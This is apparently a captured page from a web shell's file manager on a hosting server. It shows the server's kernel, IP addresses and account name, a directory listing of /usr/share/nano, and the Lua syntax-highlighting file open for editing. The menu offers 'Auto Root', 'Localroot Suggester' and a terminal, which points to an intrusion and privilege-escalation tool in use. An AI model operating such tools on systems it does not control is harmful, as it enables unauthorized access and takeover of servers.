Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nano /
Delete
Unzip
Name
Size
Permission
Date
Action
ada.nanorc
1.24
KB
-rw-r--r--
2020-06-24 13:19
asm.nanorc
687
B
-rw-r--r--
2020-06-10 09:21
autoconf.nanorc
638
B
-rw-r--r--
2020-09-19 07:40
awk.nanorc
1.32
KB
-rw-r--r--
2020-06-10 09:21
c.nanorc
1.95
KB
-rw-r--r--
2020-09-19 07:40
changelog.nanorc
800
B
-rw-r--r--
2020-09-19 07:40
cmake.nanorc
788
B
-rw-r--r--
2019-08-18 09:26
css.nanorc
505
B
-rw-r--r--
2020-08-06 13:31
debian.nanorc
758
B
-rw-r--r--
2020-06-10 09:21
default.nanorc
546
B
-rw-r--r--
2020-08-06 13:31
elisp.nanorc
1.08
KB
-rw-r--r--
2020-08-06 13:31
email.nanorc
333
B
-rw-r--r--
2020-06-10 09:21
fortran.nanorc
1.92
KB
-rw-r--r--
2020-06-10 09:21
gentoo.nanorc
4.13
KB
-rw-r--r--
2020-06-10 09:21
go.nanorc
1.42
KB
-rw-r--r--
2021-01-07 14:28
groff.nanorc
700
B
-rw-r--r--
2020-06-10 09:21
guile.nanorc
586
B
-rw-r--r--
2020-08-06 13:31
haskell.nanorc
1009
B
-rw-r--r--
2020-06-10 09:21
html.nanorc
1.22
KB
-rw-r--r--
2020-06-10 09:21
java.nanorc
654
B
-rw-r--r--
2020-06-10 09:21
javascript.nanorc
822
B
-rw-r--r--
2019-11-23 15:50
json.nanorc
856
B
-rw-r--r--
2020-08-06 13:31
lua.nanorc
2.39
KB
-rw-r--r--
2020-06-10 09:21
makefile.nanorc
536
B
-rw-r--r--
2020-06-10 09:21
man.nanorc
727
B
-rw-r--r--
2020-08-06 13:31
markdown.nanorc
947
B
-rw-r--r--
2020-09-19 07:40
nanohelp.nanorc
418
B
-rw-r--r--
2019-12-19 17:59
nanorc.nanorc
3.11
KB
-rw-r--r--
2021-03-03 08:58
nftables.nanorc
926
B
-rw-r--r--
2020-09-19 07:40
objc.nanorc
1.47
KB
-rw-r--r--
2020-06-10 09:21
ocaml.nanorc
859
B
-rw-r--r--
2018-04-10 09:57
patch.nanorc
600
B
-rw-r--r--
2020-06-10 09:21
perl.nanorc
1.66
KB
-rw-r--r--
2020-06-10 09:21
php.nanorc
1.05
KB
-rw-r--r--
2020-06-10 09:21
po.nanorc
1.09
KB
-rw-r--r--
2020-09-19 07:40
povray.nanorc
637
B
-rw-r--r--
2020-06-10 09:21
python.nanorc
1.2
KB
-rw-r--r--
2020-06-10 09:21
ruby.nanorc
1.49
KB
-rw-r--r--
2020-06-10 09:21
rust.nanorc
1023
B
-rw-r--r--
2020-08-06 13:31
sh.nanorc
1.5
KB
-rw-r--r--
2021-01-07 14:28
spec.nanorc
1.97
KB
-rw-r--r--
2020-06-10 09:21
sql.nanorc
2.85
KB
-rw-r--r--
2020-06-24 13:19
tcl.nanorc
1.95
KB
-rw-r--r--
2020-06-10 09:21
tex.nanorc
199
B
-rw-r--r--
2020-06-10 09:21
texinfo.nanorc
540
B
-rw-r--r--
2020-09-19 07:40
xml.nanorc
526
B
-rw-r--r--
2020-08-06 13:31
Save
Rename
## Syntax highlighting for Lua. ## Original author: Matthew Wild ## License: GPL version 3 or newer syntax lua "\.lua$" magic "Lua script" comment "--" linter luacheck --no-color color brightwhite "\[\[.*\]\]" # Operators color brightyellow ":|\*|/|%|\+|-|\^|>|>=|<|<=|~=|=|\.\.|#|\<(not|and|or)\>" # Don't partially color ... as an operator color normal "\.\.\." # Statements color brightblue "\<(do|end|while|repeat|until|if|elseif|then|else|for|in|function|local|return|break)\>" # Keywords color brightyellow "\<(_G|_VERSION|assert|collectgarbage|dofile|error|getfenv|getmetatable|ipairs|load|loadfile|module|next|pairs|pcall|print|rawequal|rawget|rawlen|rawset|require|select|setfenv|setmetatable|tonumber|tostring|type|unpack|xpcall)\s*\(" # Standard library color brightyellow "\<coroutine\.(create|isyieldable|resume|running|status|wrap|yield)\>" color brightyellow "\<debug\.(debug|(get|set)(fenv|hook|local|metatable|(up|user)value)|getinfo|getregistry|traceback|upvalue(id|join))\>" color brightyellow "\<io\.(close|flush|input|lines|output|p?open|read|tmpfile|type|write|std(in|out|err))\>" color brightyellow "\<math\.(abs|acos|asin|atan2?|ceil|cosh?|deg|exp|floor|fmod|frexp|huge|ldexp|log10|log)\>" color brightyellow "\<math\.((max|min)(integer)?|modf?|pi|pow|rad|random(seed)?|sinh?|sqrt|tan|tointeger|type|ult)\>" color brightyellow "\<os\.(clock|date|difftime|execute|exit|getenv|remove|rename|setlocale|time|tmpname)\>" color brightyellow "\<package\.(config|cpath|loaded|loadlib|path|preload|searchers|searchpath|seeall)\>" color brightyellow "\<string\.(byte|char|dump|find|format|gmatch|gsub|len|lower|match|pack|packsize|rep|reverse|sub|unpack|upper)\>" color brightyellow "\<table\.(concat|insert|maxn|move|pack|remove|sort|unpack)\>" color brightyellow "\<utf8\.(char|charpattern|codepoint|codes|len|offset)\>" # File handle methods color brightyellow ":(close|flush|lines|read|seek|setvbuf|write)\>" # External files color brightgreen "\<(dofile|require)\>" # Special words color brightmagenta "\<(false|nil|true)\>" # Decimal and hexadecimal numbers color red "\<[0-9]+(\.[0-9]*)?([Ee][+-]?[0-9]+)?\>" color red "\<0x[0-9A-Fa-f]+(\.[0-9A-Fa-f]*)?([Pp][+-]?[0-9]+)?\>" # Brackets color brightmagenta "\(|\)|\[|\]|\{|\}" # Shebang color brightcyan "^#!.*" # Strings color red ""(\\.|[^"\])*"|'(\\.|[^'\])*'" # Simple comments and multiline comments color green "--.*" color green start="--\[\[" end="\]\]"